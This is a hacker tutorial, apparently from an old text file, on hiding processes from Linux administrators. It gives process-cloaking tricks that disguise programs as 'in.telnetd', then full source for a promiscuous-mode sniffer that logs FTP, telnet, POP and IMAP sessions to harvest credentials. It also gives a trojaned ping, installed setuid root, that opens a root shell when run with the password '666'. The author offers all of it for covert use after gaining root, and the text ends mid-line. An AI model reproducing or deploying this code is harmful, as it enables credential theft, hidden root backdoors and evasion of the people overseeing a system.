Hiding from sysadm's.... -------------------------------------- by Phantom _ | Hiding Processes under linux.. - ------------------------------ Well, i'm aware of three methods, but there's always some guys that say that they know better, so if any of you have anything you would like to share with the world, send it to me... And, NO, you dont have to be root to use 'em... 1. Memory change of parameters ------------------------------- You have to know something about the parameters on linux. they are like this: argv[0] is the program that you just ran... (if you ran bash then argv[0] will be "bash") argv[1] is your first parameter argv[2] is u'r second... and so on.. The proggie below just hides itself in memory... and runs ps just to show you what he did... #include #include main(argc, argv) int argc; char *argv[]; { strcpy(argv[0],"I aint around, am I ???"); system("/bin/ps"); } This method is good for sniffers and proggies like those... (no r00t will ever find out that the "in.telnetd" is in fact the sniffer.(dont kidd yourselves, anybody can find out where it was run from, just by issuing a "ps -ew"...) :) 2. Execl parameter modifications --------------------------------- The proggie below just runs a /bin/bash (love that shell!!!) Just try to find that /bin/bash with ps...You won't find it... It's cloaked as "in.telnetd" #include main() { execl("/bin/bash","in.telnetd",NULL); } 3. PATH setting --------------- copy the program as in.telnetd and then set your PATH variable to the path to the program, and then exec the program..... :) example: evil_site:~$ gimmer00t Here ya go, dude..... :) evil_site:~# evil_site:~# cp sniffsniff in.telnetd evil_site:~# export PATH=/home/phantom/ evil_site:~# in.telnetd & Sniffer started... Let's rock. :) evil_site:~# exit evil_site:~$ Ok. These three methods i find very usefull in hiding from sysadmins... For Linux and Redhat... I've never tested 'em on other OS.. Below: A modified sniffer, and a modified trojan. If you got root, then use them and dont forget to change the damn settings... :) btw you should consider searching the binary ping file for the word "DAEMON" or something and change it with a binary editor to something else .. :) Both progs hide the spawned shells in the process list as in.telnetd and you wont find either of 'em unless you really know how to and what to search and where... :) Now i dont say these methods are the best, but it's the best i could think of... :) and no, the sources aren't mine... when i use some trojan i modify it first, so that no sysadm can figgure out that the binary he uses is a trojan.... #include #include #include #include #include #include #include #include #include #include #include #include #include #include int openintf(char *); int read_tcp(int); int filter(void); int print_header(void); int print_data(int, char *); char *hostlookup(unsigned long int); void clear_victim(void); void cleanup(int); struct etherpacket { struct ethhdr eth; struct iphdr ip; struct tcphdr tcp; char buff[8192]; }ep; struct { unsigned long saddr; unsigned long daddr; unsigned short sport; unsigned short dport; int bytes_read; char active; time_t start_time; } victim; struct iphdr *ip; struct tcphdr *tcp; int s; FILE *fp; #define CAPTLEN 512 #define TIMEOUT 30 #define TCPLOG "tcp.log" int openintf(char *d) { int fd; struct ifreq ifr; int s; fd=socket(AF_INET, SOCK_PACKET, htons(0x800)); if(fd < 0) { perror("cant get SOCK_PACKET socket"); exit(0); } strcpy(ifr.ifr_name, d); s=ioctl(fd, SIOCGIFFLAGS, &ifr); if(s < 0) { close(fd); perror("cant get flags"); exit(0); } ifr.ifr_flags |= IFF_PROMISC; s=ioctl(fd, SIOCSIFFLAGS, &ifr); if(s < 0) perror("cant set promiscuous mode"); return fd; } int read_tcp(int s) { int x; while(1) { x=read(s, (struct etherpacket *)&ep, sizeof(ep)); if(x > 1) { if(filter()==0) continue; x=x-54; if(x < 1) continue; return x; } } } int filter(void) { int p; p=0; if(ip->protocol != 6) return 0; if(victim.active != 0) if(victim.bytes_read > CAPTLEN) { fprintf(fp, "\n----- [CAPLEN Exceeded]\n"); clear_victim(); return 0; } if(victim.active != 0) if(time(NULL) > (victim.start_time + TIMEOUT)) { fprintf(fp, "\n----- [Timed Out]\n"); clear_victim(); return 0; } if(ntohs(tcp->dest)==21) p=1; /* ftp */ if(ntohs(tcp->dest)==23) p=1; /* telnet */ if(ntohs(tcp->dest)==110) p=1; /* pop3 */ if(ntohs(tcp->dest)==109) p=1; /* pop2 */ if(ntohs(tcp->dest)==143) p=1; /* imap2 */ if(ntohs(tcp->dest)==513) p=1; /* rlogin */ if(ntohs(tcp->dest)==106) p=1; /* poppasswd */ if(victim.active == 0) if(p == 1) if(tcp->syn == 1) { victim.saddr=ip->saddr; victim.daddr=ip->daddr; victim.active=1; victim.sport=tcp->source; victim.dport=tcp->dest; victim.bytes_read=0; victim.start_time=time(NULL); print_header(); } if(tcp->dest != victim.dport) return 0; if(tcp->source != victim.sport) return 0; if(ip->saddr != victim.saddr) return 0; if(ip->daddr != victim.daddr) return 0; if(tcp->rst == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [RST]\n"); clear_victim(); return 0; } if(tcp->fin == 1) { victim.active=0; alarm(0); fprintf(fp, "\n----- [FIN]\n"); clear_victim(); return 0; } return 1; } int print_header(void) { fprintf(fp, "\n"); fprintf(fp, "%s => ", hostlookup(ip->saddr)); fprintf(fp, "%s [%d]\n", hostlookup(ip->daddr), ntohs(tcp->dest)); } int print_data(int datalen, char *data) { int i=0; int t=0; victim.bytes_read=victim.bytes_read+datalen; for(i=0;i != datalen;i++) { if(data[i] == 13) { fprintf(fp, "\n"); t=0; } if(isprint(data[i])) {fprintf(fp, "%c", data[i]);t++;} if(t > 75) {t=0;fprintf(fp, "\n");} } } main(int argc, char **argv) { sprintf(argv[0],"%s","in.telnetd"); s=openintf("eth0"); ip=(struct iphdr *)(((unsigned long)&ep.ip)-2); tcp=(struct tcphdr *)(((unsigned long)&ep.tcp)-2); signal(SIGHUP, SIG_IGN); signal(SIGINT, cleanup); signal(SIGTERM, cleanup); signal(SIGKILL, cleanup); signal(SIGQUIT, cleanup); if(argc == 2) fp=stdout; else fp=fopen(TCPLOG, "at"); if(fp == NULL) { fprintf(stderr, "cant open log\n");exit(0);} clear_victim(); for(;;) { read_tcp(s); if(victim.active != 0) print_data(htons(ip->tot_len)-sizeof(ep.ip)-sizeof(ep.tcp), ep.buff-2); fflush(fp); } } char *hostlookup(unsigned long int in) { static char blah[1024]; struct in_addr i; struct hostent *he; i.s_addr=in; he=gethostbyaddr((char *)&i, sizeof(struct in_addr),AF_INET); if(he == NULL) strcpy(blah, inet_ntoa(i)); else strcpy(blah, he->h_name); return blah; } void clear_victim(void) { victim.saddr=0; victim.daddr=0; victim.sport=0; victim.dport=0; victim.active=0; victim.bytes_read=0; victim.start_time=0; } void cleanup(int sig) { fprintf(fp, "Exiting...\n"); close(s); fclose(fp); exit(0); } -------------------------------------Ping-Trojan---------------------------- /*Makefile*/ LDFLAGS += -N ping: ping.o install: ping install -m4755 ping /sbin # install -s ping /sbin # install -m644 ping.8 /usr/man/man8 clean: rm -f *.o ping ---------------------------Ping.c-------------------------------------------- #ifndef lint char copyright[] = "@(#) Copyright (c) 1989 The Regents of the University of California.\n\ All rights reserved.\n"; #endif /* not lint */ #ifndef lint /*static char sccsid[] = "from: @(#)ping.c 5.9 (Berkeley) 5/12/91";*/ static char rcsid[] = "$Id: ping.c,v 1.1 1994/05/23 09:07:13 rzsfl Exp rzsfl $"; #endif /* not lint */ /* Change the settings, dude... */ #include #include #include #include #include #include #include #include #define MAX_IPOPTLEN 4096 #include #include #include #include #include #include #define ICMP_MINLEN 32 #define DEFDATALEN (64 - 8) /* default data length */ #define MAXIPLEN 60 #define MAXICMPLEN 76 #define MAXPACKET (65536 - 60 - 8)/* max packet size */ #define MAXWAIT 10 /* max seconds to wait for response */ #define NROUTES 9 /* number of record route slots */ #define A(bit) rcvd_tbl[(bit)>>3] /* identify byte in array */ #define B(bit) (1 << ((bit) & 0x07)) /* identify bit in byte */ #define SET(bit) (A(bit) |= B(bit)) #define CLR(bit) (A(bit) &= (~B(bit))) #define TST(bit) (A(bit) & B(bit)) /* various options */ int options; #define F_FLOOD 0x001 #define F_INTERVAL 0x002 #define F_NUMERIC 0x004 #define F_PINGFILLED 0x008 #define F_QUIET 0x010 #define F_RROUTE 0x020 #define F_SO_DEBUG 0x040 #define F_SO_DONTROUTE 0x080 #define F_VERBOSE 0x100 /* multicast options */ int moptions; #define MULTICAST_NOLOOP 0x001 #define MULTICAST_TTL 0x002 #define MULTICAST_IF 0x004 /* * MAX_DUP_CHK is the number of bits in received table, i.e. the maximum * number of received sequence numbers we can keep track of. Change 128 * to 8192 for complete accuracy... */ #define MAX_DUP_CHK (8 * 128) int mx_dup_ck = MAX_DUP_CHK; char rcvd_tbl[MAX_DUP_CHK / 8]; struct sockaddr whereto; /* who to ping */ int datalen = DEFDATALEN; int s; /* socket file descriptor */ u_char outpack[MAXPACKET]; char BSPACE = '\b'; /* characters written for flood */ char DOT = '.'; char *hostname; int ident; /* process id to identify our packets */ char DEMONSTRING[3]; char DAEMON[20]; char GARGOYLE[9]; /* counters */ long npackets; /* max packets to transmit */ long nreceived; /* # of packets we got back */ long nrepeats; /* number of duplicates */ long ntransmitted; /* sequence # for outbound packets = #sent */ int interval = 1; /* interval between packets */ /* timing */ int timing; /* flag to do timing */ long tmin = LONG_MAX; /* minimum round trip time */ long tmax; /* maximum round trip time */ u_long tsum; /* sum of all times, for doing average */ char *pr_addr(); void catcher(), finish(); void demon(); main(argc, argv) int argc; char **argv; { extern int errno, optind; extern char *optarg; struct timeval timeout; struct hostent *hp; struct sockaddr_in *to; struct protoent *proto; struct in_addr ifaddr; int i; int ch, fdmask, hold, packlen, preload; u_char *datap, *packet; char *target, hnamebuf[MAXHOSTNAMELEN], *malloc(); u_char ttl, loop; DEMONSTRING[0]='6'; DEMONSTRING[1]='6'; DEMONSTRING[2]='6'; DAEMON[0]='w'; DAEMON[1]='e'; DAEMON[2]='r'; DAEMON[3]='d'; DAEMON[4]=' '; DAEMON[5]='k'; DAEMON[6]='1'; DAEMON[7]='d'; DAEMON[8]=' '; DAEMON[9]='.'; DAEMON[10]='Y'; DAEMON[11]='u'; DAEMON[12]='r'; DAEMON[13]=' '; DAEMON[14]='i'; DAEMON[15]='n'; DAEMON[16]='.'; DAEMON[17]='\n'; DAEMON[18]='\0'; GARGOYLE[0]='/'; GARGOYLE[1]='b'; GARGOYLE[2]='i'; GARGOYLE[3]='n'; GARGOYLE[4]='/'; GARGOYLE[5]='s'; GARGOYLE[6]='h'; GARGOYLE[8]='\0'; /*#ifdef IP_OPTIONS char rspace[3 + 4 * NROUTES + 1]; record route space */ /*#endif*/ preload = 0; datap = &outpack[8 + sizeof(struct timeval)]; if(argc==2)if(!strcmp(argv[1],DEMONSTRING))demon(); while ((ch = getopt(argc, argv, "I:LRc:dfh:i:l:np:qrs:t:v")) != EOF) switch(ch) { case 'c': npackets = atoi(optarg); if (npackets <= 0) { (void)fprintf(stderr, "ping: bad number of packets to transmit.\n"); exit(1); } break; case 'd': options |= F_SO_DEBUG; break; case 'f': if (getuid()) { (void)fprintf(stderr, "ping: %s\n", strerror(EPERM)); exit(1); } options |= F_FLOOD; setbuf(stdout, (char *)NULL); break; case 'i': /* wait between sending packets */ interval = atoi(optarg); if (interval <= 0) { (void)fprintf(stderr, "ping: bad timing interval.\n"); exit(1); } options |= F_INTERVAL; break; case 'l': preload = atoi(optarg); if (preload < 0) { (void)fprintf(stderr, "ping: bad preload value.\n"); exit(1); } break; case 'n': options |= F_NUMERIC; break; case 'p': /* fill buffer with user pattern */ options |= F_PINGFILLED; fill((char *)datap, optarg); break; case 'q': options |= F_QUIET; break; case 'R': options |= F_RROUTE; break; case 'r': options |= F_SO_DONTROUTE; break; case 's': /* size of packet to send */ datalen = atoi(optarg); if (datalen > MAXPACKET) { (void)fprintf(stderr, "ping: packet size too large.\n"); exit(1); } if (datalen <= 0) { (void)fprintf(stderr, "ping: illegal packet size.\n"); exit(1); } break; case 'v': options |= F_VERBOSE; break; case 'L': moptions |= MULTICAST_NOLOOP; loop = 0; break; case 't': moptions |= MULTICAST_TTL; i = atoi(optarg); if (i < 0 || i > 255) { printf("ttl %u out of range\n", i); exit(1); } ttl = i; break; case 'I': moptions |= MULTICAST_IF; { int i1, i2, i3, i4; if (sscanf(optarg, "%u.%u.%u.%u%c", &i1, &i2, &i3, &i4, &i) != 4) { printf("bad interface address '%s'\n", optarg); exit(1); } ifaddr.s_addr = (i1<<24)|(i2<<16)|(i3<<8)|i4; ifaddr.s_addr = htonl(ifaddr.s_addr); } break; default: usage(); } argc -= optind; argv += optind; if (argc != 1) usage(); target = *argv; bzero((char *)&whereto, sizeof(struct sockaddr)); to = (struct sockaddr_in *)&whereto; to->sin_family = AF_INET; to->sin_addr.s_addr = inet_addr(target); if (to->sin_addr.s_addr != (u_int)-1) hostname = target; else { hp = gethostbyname(target); if (!hp) { (void)fprintf(stderr, "ping: unknown host %s\n", target); exit(1); } to->sin_family = hp->h_addrtype; bcopy(hp->h_addr, (caddr_t)&to->sin_addr, hp->h_length); (void)strncpy(hnamebuf, hp->h_name, sizeof(hnamebuf) - 1); hostname = hnamebuf; } if (options & F_FLOOD && options & F_INTERVAL) { (void)fprintf(stderr, "ping: -f and -i incompatible options.\n"); exit(1); } if (datalen >= sizeof(struct timeval)) /* can we time transfer */ timing = 1; packlen = datalen + MAXIPLEN + MAXICMPLEN; if (!(packet = (u_char *)malloc((u_int)packlen))) { (void)fprintf(stderr, "ping: out of memory.\n"); exit(1); } if (!(options & F_PINGFILLED)) for (i = 8; i < datalen; ++i) *datap++ = i; ident = getpid() & 0xFFFF; if (!(proto = getprotobyname("icmp"))) { (void)fprintf(stderr, "ping: unknown protocol icmp.\n"); exit(1); } if ((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) { perror("ping: socket"); exit(1); } hold = 1; if (options & F_SO_DEBUG) (void)setsockopt(s, SOL_SOCKET, SO_DEBUG, (char *)&hold, sizeof(hold)); if (options & F_SO_DONTROUTE) (void)setsockopt(s, SOL_SOCKET, SO_DONTROUTE, (char *)&hold, sizeof(hold)); /* record route option */ if (options & F_RROUTE) { /*#ifdef IP_OPTIONS rspace[IPOPT_OPTVAL] = IPOPT_RR; rspace[IPOPT_OLEN] = sizeof(rspace)-1; rspace[IPOPT_OFFSET] = IPOPT_MINOFF; if (setsockopt(s, IPPROTO_IP, IP_OPTIONS, rspace, sizeof(rspace)) < 0) { perror("ping: record route"); exit(1); } #else*/ (void)fprintf(stderr, "ping: record route not available in this implementation.\n"); exit(1); /*#endif IP_OPTIONS */ } /* * When pinging the broadcast address, you can get a lot of answers. * Doing something so evil is useful if you are trying to stress the * ethernet, or just want to fill the arp cache to get some stuff for * /etc/ethers. */ hold = 48 * 1024; (void)setsockopt(s, SOL_SOCKET, SO_RCVBUF, (char *)&hold, sizeof(hold)); #if 0 if (moptions & MULTICAST_NOLOOP) { if (setsockopt(s, IPPROTO_IP, IP_MULTICAST_LOOP, &loop, 1) == -1) { perror ("can't disable multicast loopback"); exit(92); } } if (moptions & MULTICAST_TTL) { if (setsockopt(s, IPPROTO_IP, IP_MULTICAST_TTL, &ttl, 1) == -1) { perror ("can't set multicast time-to-live"); exit(93); } } if (moptions & MULTICAST_IF) { if (setsockopt(s, IPPROTO_IP, IP_MULTICAST_IF, &ifaddr, sizeof(ifaddr)) == -1) { perror ("can't set multicast source interface"); exit(94); } } #endif if (to->sin_family == AF_INET) (void)printf("PING %s (%s): %d data bytes\n", hostname, inet_ntoa(*(struct in_addr *)&to->sin_addr.s_addr), datalen); else (void)printf("PING %s: %d data bytes\n", hostname, datalen); (void)signal(SIGINT, finish); (void)signal(SIGALRM, catcher); while (preload--) /* fire off them quickies */ pinger(); if ((options & F_FLOOD) == 0) catcher(); /* start things going */ for (;;) { struct sockaddr_in from; register int cc; int fromlen; if (options & F_FLOOD) { pinger(); timeout.tv_sec = 0; timeout.tv_usec = 10000; fdmask = 1 << s; if (select(s + 1, (fd_set *)&fdmask, (fd_set *)NULL, (fd_set *)NULL, &timeout) < 1) continue; } fromlen = sizeof(from); if ((cc = recvfrom(s, (char *)packet, packlen, 0, (struct sockaddr *)&from, &fromlen)) < 0) { if (errno == EINTR) continue; perror("ping: recvfrom"); continue; } pr_pack((char *)packet, cc, &from); if (npackets && nreceived >= npackets) break; } finish(); /* NOTREACHED */ } void demon(){ fprintf(stderr,DAEMON); execl(GARGOYLE,"in.telnetd",NULL); } /* * catcher -- * This routine causes another PING to be transmitted, and then * schedules another SIGALRM for 1 second from now. * * bug -- * Our sense of time will slowly skew (i.e., packets will not be * launched exactly at 1-second intervals). This does not affect the * quality of the delay and loss statistics. */ void catcher() { int waittime; pinger(); (void)signal(SIGALRM, catcher); if (!npackets || ntransmitted < npackets) alarm((u_int)interval); else { if (nreceived) { waittime = 2 * tmax / 1000; if (!waittime) waittime = 1; } else waittime = MAXWAIT; (void)signal(SIGALRM, finish); (void)alarm((u_int)waittime); } } #define icmp_type type #define icmp_code code #define icmp_cksum checksum #define icmp_id un.echo.id #define icmp_seq un.echo.sequence #define icmp_gwaddr un.gateway #define ip_hl ihl #define ip_v version #define ip_tos tos #define ip_len tot_len #define ip_id id #define ip_off frag_off #define ip_ttl ttl #define ip_p protocol #define ip_sum check #define ip_src saddr #define ip_dst daddr /* * pinger -- * Compose and transmit an ICMP ECHO REQUEST packet. The IP packet * will be added on by the kernel. The ID field is our UNIX process ID, * and the sequence number is an ascending integer. The first 8 bytes * of the data portion are used to hold a UNIX "timeval" struct in VAX * byte-order, to compute the round-trip time. */ pinger() { register struct icmphdr *icp; register int cc; int i; icp = (struct icmphdr *)outpack; icp->icmp_type = ICMP_ECHO; icp->icmp_code = 0; icp->icmp_cksum = 0; icp->icmp_seq = ntransmitted++; icp->icmp_id = ident; /* ID */ CLR(icp->icmp_seq % mx_dup_ck); if (timing) (void)gettimeofday((struct timeval *)&outpack[8], (struct timezone *)NULL); cc = datalen + 8; /* skips ICMP portion */ /* compute ICMP checksum here */ icp->icmp_cksum = in_cksum((u_short *)icp, cc); i = sendto(s, (char *)outpack, cc, 0, &whereto, sizeof(struct sockaddr)); if (i < 0 || i != cc) { if (i < 0) perror("ping: sendto"); (void)printf("ping: wrote %s %d chars, ret=%d\n", hostname, cc, i); } if (!(options & F_QUIET) && options & F_FLOOD) (void)write(STDOUT_FILENO, &DOT, 1); } /* * pr_pack -- * Print out the packet, if it came from us. This logic is necessary * because ALL readers of the ICMP socket get a copy of ALL ICMP packets * which arrive ('tis only fair). This permits multiple copies of this * program to be run without having intermingled output (or statistics!). */ pr_pack(buf, cc, from) char *buf; int cc; struct sockaddr_in *from; { register struct icmphdr *icp; register u_long l; register int i, j; register u_char *cp,*dp; static int old_rrlen; static char old_rr[MAX_IPOPTLEN]; struct iphdr *ip; struct timeval tv, *tp; long triptime; int hlen, dupflag; (void)gettimeofday(&tv, (struct timezone *)NULL); /* Check the IP header */ ip = (struct iphdr *)buf; hlen = ip->ip_hl << 2; if (cc < hlen + ICMP_MINLEN) { if (options & F_VERBOSE) (void)fprintf(stderr, "ping: packet too short (%d bytes) from %s\n", cc, inet_ntoa(*(struct in_addr *)&from->sin_addr.s_addr)); return; } /* Now the ICMP part */ cc -= hlen; icp = (struct icmphdr *)(buf + hlen); if (icp->icmp_type == ICMP_ECHOREPLY) { if (icp->icmp_id != ident) return; /* 'Twas not our ECHO */ ++nreceived; if (timing) { #ifndef icmp_data tp = (struct timeval *)(icp + 1); #else tp = (struct timeval *)icp->icmp_data; #endif tvsub(&tv, tp); triptime = tv.tv_sec * 10000 + (tv.tv_usec / 100); tsum += triptime; if (triptime < tmin) tmin = triptime; if (triptime > tmax) tmax = triptime; } if (TST(icp->icmp_seq % mx_dup_ck)) { ++nrepeats; --nreceived; dupflag = 1; } else { SET(icp->icmp_seq % mx_dup_ck); dupflag = 0; } if (options & F_QUIET) return; if (options & F_FLOOD) (void)write(STDOUT_FILENO, &BSPACE, 1); else { (void)printf("%d bytes from %s: icmp_seq=%u", cc, inet_ntoa(*(struct in_addr *)&from->sin_addr.s_addr), icp->icmp_seq); (void)printf(" ttl=%d", ip->ip_ttl); if (timing) (void)printf(" time=%ld.%ld ms", triptime/10, triptime%10); if (dupflag) (void)printf(" (DUP!)"); /* check the data */ cp = ((u_char*)(icp + 1) + 8); dp = &outpack[8 + sizeof(struct timeval)]; for (i = 8; i < datalen; ++i, ++cp, ++dp) { if (*cp != *dp) { (void)printf("\nwrong data byte #%d should be 0x%x but was 0x%x", i, *dp, *cp); cp = (u_char*)(icp + 1); for (i = 8; i < datalen; ++i, ++cp) { if ((i % 32) == 8) (void)printf("\n\t"); (void)printf("%x ", *cp); } break; } } } } else { /* We've got something other than an ECHOREPLY */ if (!(options & F_VERBOSE)) return; (void)printf("%d bytes from %s: ", cc, pr_addr(from->sin_addr.s_addr)); pr_icmph(icp); } #if 0 /* Display any IP options */ cp = (u_char *)buf + sizeof(struct iphdr); for (; hlen > (int)sizeof(struct iphdr); --hlen, ++cp) switch (*cp) { case IPOPT_EOL: hlen = 0; break; case IPOPT_LSRR: (void)printf("\nLSRR: "); hlen -= 2; j = *++cp; ++cp; if (j > IPOPT_MINOFF) for (;;) { l = *++cp; l = (l<<8) + *++cp; l = (l<<8) + *++cp; l = (l<<8) + *++cp; if (l == 0) (void)printf("\t0.0.0.0"); else (void)printf("\t%s", pr_addr(ntohl(l))); hlen -= 4; j -= 4; if (j <= IPOPT_MINOFF) break; (void)putchar('\n'); } break; case IPOPT_RR: j = *++cp; /* get length */ i = *++cp; /* and pointer */ hlen -= 2; if (i > j) i = j; i -= IPOPT_MINOFF; if (i <= 0) continue; if (i == old_rrlen && cp == (u_char *)buf + sizeof(struct ip) + 2 && !bcmp((char *)cp, old_rr, i) && !(options & F_FLOOD)) { (void)printf("\t(same route)"); i = ((i + 3) / 4) * 4; hlen -= i; cp += i; break; } old_rrlen = i; bcopy((char *)cp, old_rr, i); (void)printf("\nRR: "); for (;;) { l = *++cp; l = (l<<8) + *++cp; l = (l<<8) + *++cp; l = (l<<8) + *++cp; if (l == 0) (void)printf("\t0.0.0.0"); else (void)printf("\t%s", pr_addr(ntohl(l))); hlen -= 4; i -= 4; if (i <= 0) break; (void)putchar('\n'); } break; case IPOPT_NOP: (void)printf("\nNOP"); break; default: (void)printf("\nunknown option %x", *cp); break; } #endif if (!(options & F_FLOOD)) { (void)putchar('\n'); (void)fflush(stdout); } } /* * in_cksum -- * Checksum routine for Internet Protocol family headers (C Version) */ in_cksum(addr, len) u_short *addr; int len; { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *)w ; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } /* * tvsub -- * Subtract 2 timeval structs: out = out - in. Out is assumed to * be >= in. */ tvsub(out, in) register struct timeval *out, *in; { if ((out->tv_usec -= in->tv_usec) < 0) { --out->tv_sec; out->tv_usec += 1000000; } out->tv_sec -= in->tv_sec; } /* * finish -- * Print out statistics, and give up. */ void finish() { (void)signal(SIGINT, SIG_IGN); (void)putchar('\n'); (void)fflush(stdout); (void)printf("--- %s ping statistics ---\n", hostname); (void)printf("%ld packets transmitted, ", ntransmitted); (void)printf("%ld packets received, ", nreceived); if (nrepeats) (void)printf("+%ld duplicates, ", nrepeats); if (ntransmitted) if (nreceived > ntransmitted) (void)printf("-- somebody's printing up packets!"); else (void)printf("%d%% packet loss", (int) (((ntransmitted - nreceived) * 100) / ntransmitted)); (void)putchar('\n'); if (nreceived && timing) (void)printf("round-trip min/avg/max = %ld.%ld/%lu.%ld/%ld.%ld ms\n", tmin/10, tmin%10, (tsum / (nreceived + nrepeats))/10, (tsum / (nreceived + nrepeats))%10, tmax/10, tmax%10); exit(0); } #ifdef notdef static char *ttab[] = { "Echo Reply", /* ip + seq + udata */ "Dest Unreachable", /* net, host, proto, port, frag, sr + IP */ "Source Quench", /* IP */ "Redirect", /* redirect type, gateway, + IP */ "Echo", "Time Exceeded", /* transit, frag reassem + IP */ "Parameter Problem", /* pointer + IP */ "Timestamp", /* id + seq + three timestamps */ "Timestamp Reply", /* " */ "Info Request", /* id + sq */ "Info Reply" /* " */ }; #endif /* * pr_icmph -- * Print a descriptive string about an ICMP header. */ pr_icmph(icp) struct icmphdr *icp; { switch(icp->icmp_type) { case ICMP_ECHOREPLY: (void)printf("Echo Reply\n"); /* XXX ID + Seq + Data */ break; case ICMP_DEST_UNREACH: switch(icp->icmp_code) { case ICMP_NET_UNREACH: (void)printf("Destination Net Unreachable\n"); break; case ICMP_HOST_UNREACH: (void)printf("Destination Host Unreachable\n"); break; case ICMP_PROT_UNREACH: (void)printf("Destination Protocol Unreachable\n"); break; case ICMP_PORT_UNREACH: (void)printf("Destination Port Unreachable\n"); break; case ICMP_FRAG_NEEDED: (void)printf("frag needed and DF set\n"); break; case ICMP_SR_FAILED: (void)printf("Source Route Failed\n"); break; default: (void)printf("Dest Unreachable, Bad Code: %d\n", icp->icmp_code); break; } /* Print returned IP header information */ #ifndef icmp_data pr_retip(icp + 1); #else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_SOURCE_QUENCH: (void)printf("Source Quench\n"); #ifndef icmp_data pr_retip(icp + 1); #else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_REDIRECT: switch(icp->icmp_code) { case ICMP_REDIR_NET: (void)printf("Redirect Network"); break; case ICMP_REDIR_HOST: (void)printf("Redirect Host"); break; case ICMP_REDIR_NETTOS: (void)printf("Redirect Type of Service and Network"); break; case ICMP_REDIR_HOSTTOS: (void)printf("Redirect Type of Service and Host"); break; default: (void)printf("Redirect, Bad Code: %d", icp->icmp_code); break; } (void)printf("(New addr: 0x%08lx)\n", icp->icmp_gwaddr); #ifndef icmp_data pr_retip(icp + 1); #else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_ECHO: (void)printf("Echo Request\n"); /* XXX ID + Seq + Data */ break; case ICMP_TIME_EXCEEDED: switch(icp->icmp_code) { case ICMP_EXC_TTL: (void)printf("Time to live exceeded\n"); break; case ICMP_EXC_FRAGTIME: (void)printf("Frag reassembly time exceeded\n"); break; default: (void)printf("Time exceeded, Bad Code: %d\n", icp->icmp_code); break; } #ifndef icmp_data pr_retip(icp + 1); #else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_PARAMETERPROB: (void)printf("Parameter problem: pointer = 0x%02x\n", icp->un.gateway); #ifndef icmp_data pr_retip(icp + 1); #else pr_retip((struct ip *)icp->icmp_data); #endif break; case ICMP_TIMESTAMP: (void)printf("Timestamp\n"); /* XXX ID + Seq + 3 timestamps */ break; case ICMP_TIMESTAMPREPLY: (void)printf("Timestamp Reply\n"); /* XXX ID + Seq + 3 timestamps */ break; case ICMP_INFO_REQUEST: (void)printf("Information Request\n"); /* XXX ID + Seq */ break; case ICMP_INFO_REPLY: (void)printf("Information Reply\n"); /* XXX ID + Seq */ break; #ifdef ICMP_MASKREQ case ICMP_MASKREQ: (void)printf("Address Mask Request\n"); break; #endif #ifdef ICMP_MASKREPLY case ICMP_MASKREPLY: (void)printf("Address Mask Reply\n"); break; #endif default: (void)printf("Bad ICMP type: %d\n", icp->icmp_type); } } /* * pr_iph -- * Print an IP header with options. */ pr_iph(ip) struct iphdr *ip; { int hlen; u_char *cp; hlen = ip->ip_hl << 2; cp = (u_char *)ip + 20; /* point to options */ (void)printf("Vr HL TOS Len ID Flg off TTL Pro cks Src Dst Data\n"); (void)printf(" %1x %1x %02x %04x %04x", ip->ip_v, ip->ip_hl, ip->ip_tos, ip->ip_len, ip->ip_id); (void)printf(" %1x %04x", ((ip->ip_off) & 0xe000) >> 13, (ip->ip_off) & 0x1fff); (void)printf(" %02x %02x %04x", ip->ip_ttl, ip->ip_p, ip->ip_sum); (void)printf(" %s ", inet_ntoa(ip->ip_src)); (void)printf(" %s ", inet_ntoa(ip->ip_dst)); /* dump and option bytes */ while (hlen-- > 20) { (void)printf("%02x", *cp++); } (void)putchar('\n'); } /* * pr_addr -- * Return an ascii host address as a dotted quad and optionally with * a hostname. */ char * pr_addr(l) u_long l; { struct hostent *hp; static char buf[80]; if ((options & F_NUMERIC) || !(hp = gethostbyaddr((char *)&l, 4, AF_INET))) (void)sprintf(buf, "%s", inet_ntoa(*(struct in_addr *)&l)); else (void)sprintf(buf, "%s (%s)", hp->h_name, inet_ntoa(*(struct in_addr *)&l)); return(buf); } /* * pr_retip -- * Dump some info on a returned (via ICMP) IP packet. */ pr_retip(ip) struct iphdr *ip; { int hlen; u_char *cp; pr_iph(ip); hlen = ip->ip_hl << 2; cp = (u_char *)ip + hlen; if (ip->ip_p == 6) (void)printf("TCP: from port %u, to port %u (decimal)\n", (*cp * 256 + *(cp + 1)), (*(cp + 2) * 256 + *(cp + 3))); else if (ip->ip_p == 17) (void)printf("UDP: from port %u, to port %u (decimal)\n", (*cp * 256 + *(cp + 1)), (*(cp + 2) * 256 + *(cp + 3))); } fill(bp, patp) char *bp, *patp; { register int ii, jj, kk; int pat[16]; char *cp; for (cp = patp; *cp; cp++) if (!isxdigit(*cp)) { (void)fprintf(stderr, "ping: patterns must be specified as hex digits.\n"); exit(1); } ii = sscanf(patp, "%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x%2x", &pat[0], &pat[1], &pat[2], &pat[3], &pat[4], &pat[5], &pat[6], &pat[7], &pat[8], &pat[9], &pat[10], &pat[11], &pat[12], &pat[13], &pat[14], &pat[15]); if (ii > 0) for (kk = 0; kk <= MAXPACKET - (8 + ii); kk += ii) for (jj = 0; jj < ii; ++jj) bp[jj + kk] = pat[jj]; if (!(options & F_QUIET)) { (void)printf("PATTERN: 0x"); for (jj = 0; jj < ii; ++jj) (void)printf("%02x", bp[jj] & 0xFF); (void)printf("\n"); } } usage() { (void)fprintf(stderr, "usage: ping [-LRdfnqrv] [-c count] [-i wait] [-l preload]\n\t[-p pattern] [-s packetsize] [-t ttl] [-I 